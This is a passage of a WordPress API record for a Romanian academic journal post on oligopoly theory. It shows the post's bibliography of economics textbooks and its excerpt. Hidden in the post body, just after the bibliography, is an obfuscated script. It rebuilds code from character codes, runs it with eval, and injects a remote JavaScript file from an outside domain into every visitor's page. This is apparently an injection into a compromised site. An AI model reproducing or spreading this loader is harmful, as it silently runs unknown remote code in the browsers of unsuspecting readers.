justify;\"><span style=\"color: #000000;\"><strong>Bibliografie:<\/strong><\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li><span style=\"color: #000000;\">Catedra de Economie, Colectivul de Micro si Macroeconomie &#8211; MICROECONOMIE (Note de curs), Edi\u0163ia a II-a, Editura Universit\u0103\u0163ii de Vest, Timi\u015foara, 2009<\/span><\/li>\n<li><span style=\"color: #000000;\">Monica Dudian \u2013 Bazele Economiei, Editura All Beck, 2001<\/span><\/li>\n<li><span style=\"color: #000000;\">Paul A. Samuelson, William D. Nordhaus \u2013 Economie, editia a XV-a , Editura Teora, 2000<\/span><\/li>\n<li style=\"text-align: justify;\"><span style=\"color: #000000;\"><a href=\"http:\/\/www.eumed.net\/ecorom\/VIII.%20%20Pietele%20neconcurentiale\/3%20oligopolul.htm\">http:\/\/www.eumed.net\/ecorom\/VIII.%20%20Pietele%20neconcurentiale\/3%20oligopolul.htm<\/a><\/span><\/li>\n<\/ul>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1.1 Introducere \u00cen dezvoltarea istorica a studiilor teoretice cu privire la oligopol se disting doua faze. \u00cen cadrul primei faze, denumita si traditionala, analiza a fost asezata pe studiul concurentei si a monopolului. Deoarece problemele decizionale ale oligopolului sunt mult mai complexe dec\u00e2t cele ale \u00eentreprinderii monopoliste sau ale celei concurentiale, protagonistii acestei faze, folosind [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[26,81,83],"tags":[123,122],"_links":{"self":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/481"}],"collection":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/comments?post=481"}],"version-history":[{"count":1,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/481\/revisions"}],"predecessor-version":[{"id":482,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/481\/revisions\/482"}],"wp:attachment":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/media?parent=481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/categories?post=481"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/tags?post=481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}